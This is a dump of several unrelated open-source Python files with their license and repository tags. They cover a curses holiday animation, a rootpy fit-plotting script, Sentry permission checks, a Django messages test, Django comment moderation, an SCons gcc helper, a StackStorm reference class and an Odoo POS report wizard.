lookdeer1.addstr(9, 11, "\\>/>")
lookdeer2.addstr(0, 16, "\\/ \\/")
lookdeer2.addstr(1, 17, "\\Y/ \\Y/")
lookdeer2.addstr(2, 19, "\\=/")
lookdeer2.addstr(3, 17, "^\\o o/^")
lookdeer2.addstr(4, 17, "//( )")
lookdeer2.addstr(5, 7, "^~~~~~~~~// \\O/")
lookdeer2.addstr(6, 7, "(( )____( /") # ))
lookdeer2.addstr(7, 7, "( / |")
lookdeer2.addstr(8, 8, "\\/ |")
lookdeer2.addstr(9, 9, "|> |>")
lookdeer3.addstr(0, 16, "\\/ \\/")
lookdeer3.addstr(1, 17, "\\Y/ \\Y/")
lookdeer3.addstr(2, 19, "\\=/")
lookdeer3.addstr(3, 17, "^\\o o/^")
lookdeer3.addstr(4, 17, "//( )")
lookdeer3.addstr(5, 7, "^~~~~~~~~// \\O/")
lookdeer3.addstr(6, 6, "( ()_____( /") # ))
lookdeer3.addstr(7, 6, "/ / /")
lookdeer3.addstr(8, 5, "|/ \\")
lookdeer3.addstr(9, 5, "/> \\>")
lookdeer4.addstr(0, 16, "\\/ \\/")
lookdeer4.addstr(1, 17, "\\Y/ \\Y/")
lookdeer4.addstr(2, 19, "\\=/")
lookdeer4.addstr(3, 17, "^\\o o/^")
lookdeer4.addstr(4, 17, "//( )")
lookdeer4.addstr(5, 7, "^~~~~~~~~// \\O/")
lookdeer4.addstr(6, 6, "( )______( /") # )
lookdeer4.addstr(7, 5, "(/ \\") # )
lookdeer4.addstr(8, 0, "v___= ----^")
###############################################
curses.cbreak()
stdscr.nodelay(1)
while 1:
stdscr.clear()
treescrn.erase()
w_del_msg.touchwin()
treescrn.touchwin()
treescrn2.erase()
treescrn2.touchwin()
treescrn8.erase()
treescrn8.touchwin()
stdscr.refresh()
look_out(150)
boxit()
stdscr.refresh()
look_out(150)
seas()
stdscr.refresh()
greet()
stdscr.refresh()
look_out(150)
fromwho()
stdscr.refresh()
look_out(150)
tree()
look_out(150)
balls()
look_out(150)
star()
look_out(150)
strng1()
strng2()
strng3()
strng4()
strng5()
# set up the windows for our blinking trees
#
# treescrn3
treescrn.overlay(treescrn3)
# balls
treescrn3.addch(4, 18, ord(' '))
treescrn3.addch(7, 6, ord(' '))
treescrn3.addch(8, 19, ord(' '))
treescrn3.addch(11, 22, ord(' '))
# star
treescrn3.addch(0, 12, ord('*'))
# strng1
treescrn3.addch(3, 11, ord(' '))
# strng2
treescrn3.addch(5, 13, ord(' '))
treescrn3.addch(6, 10, ord(' '))
# strng3
treescrn3.addch(7, 16, ord(' '))
treescrn3.addch(7, 14, ord(' '))
# strng4
treescrn3.addch(10, 13, ord(' '))
treescrn3.addch(10, 10, ord(' '))
treescrn3.addch(11, 8, ord(' '))
# strng5
treescrn3.addch(11, 18, ord(' '))
treescrn3.addch(12, 13, ord(' '))
# treescrn4
treescrn.overlay(treescrn4)
# balls
treescrn4.addch(3, 9, ord(' '))
treescrn4.addch(4, 16, ord(' '))
treescrn4.addch(7, 6, ord(' '))
treescrn4.addch(8, 19, ord(' '))
treescrn4.addch(11, 2, ord(' '))
treescrn4.addch(12, 23, ord(' '))
# star
treescrn4.standout()
treescrn4.addch(0, 12, ord('*'))
treescrn4.standend()
# strng1
treescrn4.addch(3, 13, ord(' '))
# strng2
# strng3
treescrn4.addch(7, 15, ord(' '))
treescrn4.addch(8, 11, ord(' '))
# strng4
treescrn4.addch(9, 16, ord(' '))
treescrn4.addch(10, 12, ord(' '))
treescrn4.addch(11, 8, ord(' '))
# strng5
treescrn4.addch(11, 18, ord(' '))
treescrn4.addch(12, 14, ord(' '))
# treescrn5
treescrn.overlay(treescrn5)
# balls
treescrn5.addch(3, 15, ord(' '))
treescrn5.addch(10, 20, ord(' '))
treescrn5.addch(12, 1, ord(' '))
# star
treescrn5.addch(0, 12, ord(' '))
# strng1
treescrn5.addch(3, 11, ord(' '))
# strng2
treescrn5.addch(5, 12, ord(' '))
# strng3
treescrn5.addch(7, 14, ord(' '))
treescrn5.addch(8, 10, ord(' '))
# strng4
treescrn5.addch(9, 15, ord(' '))
treescrn5.addch(10, 11, ord(' '))
treescrn5.addch(11, 7, ord(' '))
# strng5
treescrn5.addch(11, 17, ord(' '))
treescrn5.addch(12, 13, ord(' '))
# treescrn6
treescrn.overlay(treescrn6)
# balls
treescrn6.addch(6, 7, ord(' '))
treescrn6.addch(7, 18, ord(' '))
treescrn6.addch(10, 4, ord(' '))
treescrn6.addch(11, 23, ord(' '))
# star
treescrn6.standout()
treescrn6.addch(0, 12, ord('*'))
treescrn6.standend()
# strng1
# strng2
treescrn6.addch(5, 11, ord(' '))
# strng3
treescrn6.addch(7, 13, ord(' '))
treescrn6.addch(8, 9, ord(' '))
# strng4
treescrn6.addch(9, 14, ord(' '))
treescrn6.addch(10, 10, ord(' '))
treescrn6.addch(11, 6, ord(' '))
# strng5
treescrn6.addch(11, 16, ord(' '))
treescrn6.addch(12, 12, ord(' '))
# treescrn7
treescrn.overlay(treescrn7)
# balls
treescrn7.addch(3, 15, ord(' '))
treescrn7.addch(6, 7, ord(' '))
treescrn7.addch(7, 18, ord(' '))
treescrn7.addch(10, 4, ord(' '))
treescrn7.addch(11, 22, ord(' '))
# star
treescrn7.addch(0, 12, ord('*'))
# strng1
treescrn7.addch(3, 12, ord(' '))
# strng2
treescrn7.addch(5, 13, ord(' '))
treescrn7.addch(6, 9, ord(' '))
# strng3
treescrn7.addch(7, 15, ord(' '))
treescrn7.addch(8, 11, ord(' '))
# strng4
treescrn7.addch(9, 16, ord(' '))
treescrn7.addch(10, 12, ord(' '))
treescrn7.addch(11, 8, ord(' '))
# strng5
treescrn7.addch(11, 18, ord(' '))
treescrn7.addch(12, 14, ord(' '))
look_out(150)
reindeer()
w_holiday.touchwin()
w_holiday.refresh()
w_del_msg.refresh()
look_out(500)
for i in range(0, 20):
blinkit()
curses.wrapper(main)
| lgpl-2.1 |
yukisakurai/hhana | statstools/tests/test_finalfit_uncerband_plot.py | 5 | 2790 | from array import array
import rootpy
import ROOT
rootpy.log.basic_config_colorized()
from rootpy.io import root_open
from rootpy.plotting import Canvas,Graph
from rootpy.plotting import set_style
from statstools.finalfit_uncertband_plot import getPostFitPlottingObjects
from statstools.finalfit_uncertband_plot import UncertGraph
set_style('ATLAS')
# ------------------------------
def Fit_WS(workspace):
"""
Fit the WS and compute the histograms and TGraphAssymErrors
for the final plotting drawing
Parameters
----------
workspace : RooWorkspace
HSG4 like workspace
"""
# --> Get the Model Config object
mc = workspace.obj("ModelConfig")
if not mc:
raise RuntimeError('Could not retrieve the ModelConfig object')
mc.GetParametersOfInterest().first().setVal(1)
# fit_res = 0
roo_min = workspace.fit()
fit_res = roo_min.save()
fit_res.Print()
# --> Get the data distribution
obsData = workspace.data('obsData')
if not obsData:
raise RuntimeError('Could not retrieve the data histograms')
# --> Get the simultaneous PDF
simPdf = mc.GetPdf()
if not simPdf:
raise RuntimeError('Could not retrieve the simultaneous pdf')
plotting_objects = getPostFitPlottingObjects(mc,obsData,simPdf,fit_res)
out_file = ROOT.TFile('frames.root','RECREATE')
for obj in plotting_objects:
obj.Write()
out_file.Close()
# ------------------------------------------------------------------------
# ------- MAIN DRIVER --------------
# ------------------------------------------------------------------------
# rfile = root_open( '../../../workspaces_comparison/workspaces/mva/ws_measurement_hh_combination_125.root')
# ws = rfile.Get('combined')
# Fit_WS(ws)
# rfile = root_open( '../../workspaces/hh_combination_mva_125_v1/ws_measurement_hh_combination_125.root')
# ws = rfile.Get( 'combined' )
# Fit_WS(ws)
# channel_name = 'channel_boosted_125'
channel_name = 'channel_vbf_125_12'
frame_file = root_open('frames.root')
frame = frame_file.Get(channel_name)
hbkg_plus_sig = frame_file.Get('hbkg_plus_sig_'+channel_name)
hbkg = frame_file.Get('hbkg_'+channel_name)
hbkg.SetLineColor(ROOT.kRed)
curve_uncert = frame.getCurve( 'FitError_AfterFit_Mu0' )
graph = UncertGraph(hbkg, curve_uncert)
curve_uncert_sig = frame.getCurve('FitError_AfterFit')
graph_sig = UncertGraph( hbkg_plus_sig, curve_uncert_sig )
graph.fillstyle='solid'
graph.SetFillColor(ROOT.kRed-7)
graph.SetLineColor(ROOT.kRed)
graph.SetMarkerColor(ROOT.kRed)
c = Canvas()
c.cd()
# c.SetLogy()
hbkg.Draw('HIST')
graph.Draw('sameE2')
graph_sig.Draw( 'sameE2')
hbkg.Draw('SAMEHIST')
hbkg_plus_sig.Draw('SAMEHIST')
c.SaveAs('toto.png')
| gpl-3.0 |
simmetria/sentry | src/sentry/permissions.py | 2 | 4737 | """
sentry.permissions
~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2012 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from functools import wraps
from sentry.conf import settings
from sentry.constants import MEMBER_OWNER
from sentry.plugins import plugins
def perm_override(perm):
def inner(func):
@wraps(func)
def wrapped(user, *args, **kwargs):
# permissions always take precedence
if user.has_perm('sentry.%s' % (perm,)):
return True
return func(user, *args, **kwargs)
return wrapped
return inner
def requires_login(func):
@wraps(func)
def wrapped(user, *args, **kwargs):
if not (user and user.is_authenticated()):
return False
return func(user, *args, **kwargs)
return wrapped
@requires_login
@perm_override('can_add_project')
def can_create_projects(user, team=None):
"""
Returns a boolean describing whether a user has the ability to
create new projects.
"""
# must be an owner of team
if team and not team.member_set.filter(user=user, type=MEMBER_OWNER).exists():
return False
result = plugins.first('has_perm', user, 'add_project', team)
if result is None:
result = settings.ALLOW_PROJECT_CREATION
if result is False:
return result
return True
@requires_login
@perm_override('can_add_team')
def can_create_teams(user):
"""
Returns a boolean describing whether a user has the ability to
create new projects.
"""
result = plugins.first('has_perm', user, 'add_team')
if result is None:
result = settings.ALLOW_TEAM_CREATION
if result is False:
return result
return True
@requires_login
@perm_override('can_change_project')
def can_set_public_projects(user):
"""
Returns a boolean describing whether a user has the ability to
change the ``public`` attribute of projects.
"""
result = plugins.first('has_perm', user, 'set_project_public')
if result is None:
result = settings.ALLOW_PUBLIC_PROJECTS
if result is False:
return result
return True
@requires_login
@perm_override('can_add_teammember')
def can_add_team_member(user, team):
# must be an owner of the team
if not team.member_set.filter(user=user, type=MEMBER_OWNER).exists():
return False
result = plugins.first('has_perm', user, 'add_team_member', team)
if result is False:
return False
return True
@requires_login
def can_manage_team_member(user, member, django_perm, perm):
# permissions always take precedence
if user.has_perm(django_perm):
return True
# must be an owner of the team
if not member.team.member_set.filter(user=user, type=MEMBER_OWNER).exists():
return False
result = plugins.first('has_perm', user, perm, member)
if result is False:
return False
return True
def can_edit_team_member(user, member):
return can_manage_team_member(user, member, 'sentry.can_change_teammember', 'edit_team_member')
def can_remove_team_member(user, member):
return can_manage_team_member(user, member, 'sentry.can_remove_teammember', 'remove_team_member')
@requires_login
def can_remove_team(user, team):
# projects with teams can never be removed
if team.project_set.exists():
return False
# permissions always take precedence
if user.has_perm('sentry.can_remove_team'):
return True
# must be an owner of the team
if not team.member_set.filter(user=user, type=MEMBER_OWNER).exists():
return False
result = plugins.first('has_perm', user, 'remove_team', team)
if result is False:
return False
return True
@requires_login
def can_remove_project(user, project):
if project.is_default_project():
return False
# permissions always take precedence
if user.has_perm('sentry.can_remove_project'):
return True
# must be an owner of the team
if not project.team.member_set.filter(user=user, type=MEMBER_OWNER).exists():
return False
result = plugins.first('has_perm', user, 'remove_project', project)
if result is False:
return False
return True
@requires_login
@perm_override('can_change_group')
def can_admin_group(user, group):
from sentry.models import Team
# We make the assumption that we have a valid membership here
try:
Team.objects.get_for_user(user)[group.project.team.slug]
except KeyError:
return False
result = plugins.first('has_perm', user, 'admin_event', group)
if result is False:
return False
return True
| bsd-3-clause |
ar45/django | tests/messages_tests/test_api.py | 337 | 1453 | from django.contrib import messages
from django.test import RequestFactory, SimpleTestCase
class DummyStorage(object):
"""
dummy message-store to test the api methods
"""
def __init__(self):
self.store = []
def add(self, level, message, extra_tags=''):
self.store.append(message)
class ApiTest(SimpleTestCase):
def setUp(self):
self.rf = RequestFactory()
self.request = self.rf.request()
self.storage = DummyStorage()
def test_ok(self):
msg = 'some message'
self.request._messages = self.storage
messages.add_message(self.request, messages.DEBUG, msg)
self.assertIn(msg, self.storage.store)
def test_request_is_none(self):
msg = 'some message'
self.request._messages = self.storage
with self.assertRaises(TypeError):
messages.add_message(None, messages.DEBUG, msg)
self.assertEqual([], self.storage.store)
def test_middleware_missing(self):
msg = 'some message'
with self.assertRaises(messages.MessageFailure):
messages.add_message(self.request, messages.DEBUG, msg)
self.assertEqual([], self.storage.store)
def test_middleware_missing_silently(self):
msg = 'some message'
messages.add_message(self.request, messages.DEBUG, msg,
fail_silently=True)
self.assertEqual([], self.storage.store)
| bsd-3-clause |
varunagrawal/azure-services | varunagrawal/site-packages/django/contrib/comments/moderation.py | 95 | 13544 | """
A generic comment-moderation system which allows configuration of
moderation options on a per-model basis.
To use, do two things:
1. Create or import a subclass of ``CommentModerator`` defining the
options you want.
2. Import ``moderator`` from this module and register one or more
models, passing the models and the ``CommentModerator`` options
class you want to use.
Example
-------
First, we define a simple model class which might represent entries in
a Weblog::
from django.db import models
class Entry(models.Model):
title = models.CharField(maxlength=250)
body = models.TextField()
pub_date = models.DateField()
enable_comments = models.BooleanField()
Then we create a ``CommentModerator`` subclass specifying some
moderation options::
from django.contrib.comments.moderation import CommentModerator, moderator
class EntryModerator(CommentModerator):
email_notification = True
enable_field = 'enable_comments'
And finally register it for moderation::
moderator.register(Entry, EntryModerator)
This sample class would apply two moderation steps to each new
comment submitted on an Entry:
* If the entry's ``enable_comments`` field is set to ``False``, the
comment will be rejected (immediately deleted).
* If the comment is successfully posted, an email notification of the
comment will be sent to site staff.
For a full list of built-in moderation options and other
configurability, see the documentation for the ``CommentModerator``
class.
"""
import datetime
from django.conf import settings
from django.core.mail import send_mail
from django.contrib.comments import signals
from django.db.models.base import ModelBase
from django.template import Context, loader
from django.contrib import comments
from django.contrib.sites.models import Site
from django.utils import timezone
class AlreadyModerated(Exception):
"""
Raised when a model which is already registered for moderation is
attempting to be registered again.
"""
pass
class NotModerated(Exception):
"""
Raised when a model which is not registered for moderation is
attempting to be unregistered.
"""
pass
class CommentModerator(object):
"""
Encapsulates comment-moderation options for a given model.
This class is not designed to be used directly, since it doesn't
enable any of the available moderation options. Instead, subclass
it and override attributes to enable different options::
``auto_close_field``
If this is set to the name of a ``DateField`` or
``DateTimeField`` on the model for which comments are
being moderated, new comments for objects of that model
will be disallowed (immediately deleted) when a certain
number of days have passed after the date specified in
that field. Must be used in conjunction with
``close_after``, which specifies the number of days past
which comments should be disallowed. Default value is
``None``.
``auto_moderate_field``
Like ``auto_close_field``, but instead of outright
deleting new comments when the requisite number of days
have elapsed, it will simply set the ``is_public`` field
of new comments to ``False`` before saving them. Must be
used in conjunction with ``moderate_after``, which
specifies the number of days past which comments should be
moderated. Default value is ``None``.
``close_after``
If ``auto_close_field`` is used, this must specify the
number of days past the value of the field specified by
``auto_close_field`` after which new comments for an
object should be disallowed. Default value is ``None``.
``email_notification``
If ``True``, any new comment on an object of this model
which survives moderation will generate an email to site
staff. Default value is ``False``.
``enable_field``
If this is set to the name of a ``BooleanField`` on the
model for which comments are being moderated, new comments
on objects of that model will be disallowed (immediately
deleted) whenever the value of that field is ``False`` on
the object the comment would be attached to. Default value
is ``None``.
``moderate_after``
If ``auto_moderate_field`` is used, this must specify the number
of days past the value of the field specified by
``auto_moderate_field`` after which new comments for an
object should be marked non-public. Default value is
``None``.
Most common moderation needs can be covered by changing these
attributes, but further customization can be obtained by
subclassing and overriding the following methods. Each method will
be called with three arguments: ``comment``, which is the comment
being submitted, ``content_object``, which is the object the
comment will be attached to, and ``request``, which is the
``HttpRequest`` in which the comment is being submitted::
``allow``
Should return ``True`` if the comment should be allowed to
post on the content object, and ``False`` otherwise (in
which case the comment will be immediately deleted).
``email``
If email notification of the new comment should be sent to
site staff or moderators, this method is responsible for
sending the email.
``moderate``
Should return ``True`` if the comment should be moderated
(in which case its ``is_public`` field will be set to
``False`` before saving), and ``False`` otherwise (in
which case the ``is_public`` field will not be changed).
Subclasses which want to introspect the model for which comments
are being moderated can do so through the attribute ``_model``,
which will be the model class.
"""
auto_close_field = None
auto_moderate_field = None
close_after = None
email_notification = False
enable_field = None
moderate_after = None
def __init__(self, model):
self._model = model
def _get_delta(self, now, then):
"""
Internal helper which will return a ``datetime.timedelta``
representing the time between ``now`` and ``then``. Assumes
``now`` is a ``datetime.date`` or ``datetime.datetime`` later
than ``then``.
If ``now`` and ``then`` are not of the same type due to one of
them being a ``datetime.date`` and the other being a
``datetime.datetime``, both will be coerced to
``datetime.date`` before calculating the delta.
"""
if now.__class__ is not then.__class__:
now = datetime.date(now.year, now.month, now.day)
then = datetime.date(then.year, then.month, then.day)
if now < then:
raise ValueError("Cannot determine moderation rules because date field is set to a value in the future")
return now - then
def allow(self, comment, content_object, request):
"""
Determine whether a given comment is allowed to be posted on
a given object.
Return ``True`` if the comment should be allowed, ``False
otherwise.
"""
if self.enable_field:
if not getattr(content_object, self.enable_field):
return False
if self.auto_close_field and self.close_after is not None:
close_after_date = getattr(content_object, self.auto_close_field)
if close_after_date is not None and self._get_delta(timezone.now(), close_after_date).days >= self.close_after:
return False
return True
def moderate(self, comment, content_object, request):
"""
Determine whether a given comment on a given object should be
allowed to show up immediately, or should be marked non-public
and await approval.
Return ``True`` if the comment should be moderated (marked
non-public), ``False`` otherwise.
"""
if self.auto_moderate_field and self.moderate_after is not None:
moderate_after_date = getattr(content_object, self.auto_moderate_field)
if moderate_after_date is not None and self._get_delta(timezone.now(), moderate_after_date).days >= self.moderate_after:
return True
return False
def email(self, comment, content_object, request):
"""
Send email notification of a new comment to site staff when email
notifications have been requested.
"""
if not self.email_notification:
return
recipient_list = [manager_tuple[1] for manager_tuple in settings.MANAGERS]
t = loader.get_template('comments/comment_notification_email.txt')
c = Context({ 'comment': comment,
'content_object': content_object })
subject = '[%s] New comment posted on "%s"' % (Site.objects.get_current().name,
content_object)
message = t.render(c)
send_mail(subject, message, settings.DEFAULT_FROM_EMAIL, recipient_list, fail_silently=True)
class Moderator(object):
"""
Handles moderation of a set of models.
An instance of this class will maintain a list of one or more
models registered for comment moderation, and their associated
moderation classes, and apply moderation to all incoming comments.
To register a model, obtain an instance of ``Moderator`` (this
module exports one as ``moderator``), and call its ``register``
method, passing the model class and a moderation class (which
should be a subclass of ``CommentModerator``). Note that both of
these should be the actual classes, not instances of the classes.
To cease moderation for a model, call the ``unregister`` method,
passing the model class.
For convenience, both ``register`` and ``unregister`` can also
accept a list of model classes in place of a single model; this
allows easier registration of multiple models with the same
``CommentModerator`` class.
The actual moderation is applied in two phases: one prior to
saving a new comment, and the other immediately after saving. The
pre-save moderation may mark a comment as non-public or mark it to
be removed; the post-save moderation may delete a comment which
was disallowed (there is currently no way to prevent the comment
being saved once before removal) and, if the comment is still
around, will send any notification emails the comment generated.
"""
def __init__(self):
self._registry = {}
self.connect()
def connect(self):
"""
Hook up the moderation methods to pre- and post-save signals
from the comment models.
"""
signals.comment_will_be_posted.connect(self.pre_save_moderation, sender=comments.get_model())
signals.comment_was_posted.connect(self.post_save_moderation, sender=comments.get_model())
def register(self, model_or_iterable, moderation_class):
"""
Register a model or a list of models for comment moderation,
using a particular moderation class.
Raise ``AlreadyModerated`` if any of the models are already
registered.
"""
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model in self._registry:
raise AlreadyModerated("The model '%s' is already being moderated" % model._meta.module_name)
self._registry[model] = moderation_class(model)
def unregister(self, model_or_iterable):
"""
Remove a model or a list of models from the list of models
whose comments will be moderated.
Raise ``NotModerated`` if any of the models are not currently
registered for moderation.
"""
if isinstance(model_or_iterable, ModelBase):
model_or_iterable = [model_or_iterable]
for model in model_or_iterable:
if model not in self._registry:
raise NotModerated("The model '%s' is not currently being moderated" % model._meta.module_name)
del self._registry[model]
def pre_save_moderation(self, sender, comment, request, **kwargs):
"""
Apply any necessary pre-save moderation steps to new
comments.
"""
model = comment.content_type.model_class()
if model not in self._registry:
return
content_object = comment.content_object
moderation_class = self._registry[model]
# Comment will be disallowed outright (HTTP 403 response)
if not moderation_class.allow(comment, content_object, request):
return False
if moderation_class.moderate(comment, content_object, request):
comment.is_public = False
def post_save_moderation(self, sender, comment, request, **kwargs):
"""
Apply any necessary post-save moderation steps to new
comments.
"""
model = comment.content_type.model_class()
if model not in self._registry:
return
self._registry[model].email(comment, comment.content_object, request)
# Import this instance in your own code to use in registering
# your models for moderation.
moderator = Moderator()
| gpl-2.0 |
Leatherface75/xbmc | lib/libUPnP/Neptune/Build/Tools/SCons/gcc-generic.py | 199 | 1249 | import os
def generate(env, gcc_cross_prefix=None, gcc_strict=True, gcc_stop_on_warning=None):
if gcc_stop_on_warning == None: gcc_stop_on_warning = env['stop_on_warning']
### compiler flags
if gcc_strict:
env.AppendUnique(CCFLAGS = ['-pedantic', '-Wall', '-W', '-Wundef', '-Wno-long-long'])
env.AppendUnique(CFLAGS = ['-Wmissing-prototypes', '-Wmissing-declarations'])
else:
env.AppendUnique(CCFLAGS = ['-Wall'])
compiler_defines = ['-D_REENTRANT']
env.AppendUnique(CCFLAGS = compiler_defines)
env.AppendUnique(CPPFLAGS = compiler_defines)
if env['build_config'] == 'Debug':
env.AppendUnique(CCFLAGS = '-g')
else:
env.AppendUnique(CCFLAGS = '-O3')
if gcc_stop_on_warning:
env.AppendUnique(CCFLAGS = ['-Werror'])
if gcc_cross_prefix:
env['ENV']['PATH'] += os.environ['PATH']
env['AR'] = gcc_cross_prefix+'-ar'
env['RANLIB'] = gcc_cross_prefix+'-ranlib'
env['CC'] = gcc_cross_prefix+'-gcc'
env['CXX'] = gcc_cross_prefix+'-g++'
env['LINK'] = gcc_cross_prefix+'-g++'
if gcc_cross_prefix:
env['ENV']['PATH'] = os.environ['PATH'] + ':' + env['ENV']['PATH']
| gpl-2.0 |
jtopjian/st2 | st2common/st2common/models/system/common.py | 13 | 3366 | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__all__ = [
'InvalidReferenceError',
'InvalidResourceReferenceError',
'ResourceReference',
]
PACK_SEPARATOR = '.'
class InvalidReferenceError(ValueError):
def __init__(self, ref):
message = 'Invalid reference: %s' % (ref)
self.ref = ref
self.message = message
super(InvalidReferenceError, self).__init__(message)
class InvalidResourceReferenceError(ValueError):
def __init__(self, ref):
message = 'Invalid resource reference: %s' % (ref)
self.ref = ref
self.message = message
super(InvalidResourceReferenceError, self).__init__(message)
class ResourceReference(object):
"""
Class used for referring to resources which belong to a content pack.
"""
def __init__(self, pack=None, name=None):
self.pack = self.validate_pack_name(pack=pack)
self.name = name
self.ref = self.to_string_reference(pack=pack, name=name)
@staticmethod
def is_resource_reference(ref):
"""
This method uses a very naive approach to determine if the provided
string is a resource reference - it only checks if this string contains
a separator.
:rtype ref: ``str``
"""
return PACK_SEPARATOR in ref
@staticmethod
def from_string_reference(ref):
pack = ResourceReference.get_pack(ref)
name = ResourceReference.get_name(ref)
return ResourceReference(pack=pack, name=name)
@staticmethod
def to_string_reference(pack=None, name=None):
if pack and name:
pack = ResourceReference.validate_pack_name(pack=pack)
return PACK_SEPARATOR.join([pack, name])
else:
raise ValueError('Both pack and name needed for building ref. pack=%s, name=%s' %
(pack, name))
@staticmethod
def validate_pack_name(pack):
if PACK_SEPARATOR in pack:
raise ValueError('Pack name should not contain "%s"' % (PACK_SEPARATOR))
return pack
@staticmethod
def get_pack(ref):
try:
return ref.split(PACK_SEPARATOR, 1)[0]
except (IndexError, AttributeError):
raise InvalidResourceReferenceError(ref=ref)
@staticmethod
def get_name(ref):
try:
return ref.split(PACK_SEPARATOR, 1)[1]
except (IndexError, AttributeError):
raise InvalidResourceReferenceError(ref=ref)
def __repr__(self):
return ('<ResourceReference pack=%s,name=%s,ref=%s>' %
(self.pack, self.name, self.ref))
| apache-2.0 |
codekaki/odoo | addons/point_of_sale/wizard/pos_details.py | 55 | 2439 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import osv, fields
class pos_details(osv.osv_memory):
_name = 'pos.details'
_description = 'Sales Details'
_columns = {
'date_start': fields.date('Date Start', required=True),
'date_end': fields.date('Date End', required=True),
'user_ids': fields.many2many('res.users', 'pos_details_report_user_rel', 'user_id', 'wizard_id', 'Salespeople'),
}
_defaults = {
'date_start': lambda *a: time.strftime('%Y-%m-%d'),
'date_end': lambda *a: time.strftime('%Y-%m-%d'),
}
def print_report(self, cr, uid, ids, context=None):
"""
To get the date and print the report
@param self: The object pointer.
@param cr: A database cursor
@param uid: ID of the user currently logged in
@param context: A standard dictionary
@return : retrun report
"""
if context is None:
context = {}
datas = {'ids': context.get('active_ids', [])}
res = self.read(cr, uid, ids, ['date_start', 'date_end', 'user_ids'], context=context)
res = res and res[0] or {}
datas['form'] = res
if res.get('id',False):
datas['ids']=[res['id']]
return {
'type': 'ir.actions.report.xml',
'report_name': 'pos.details',
'datas': datas,
}
pos_details()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.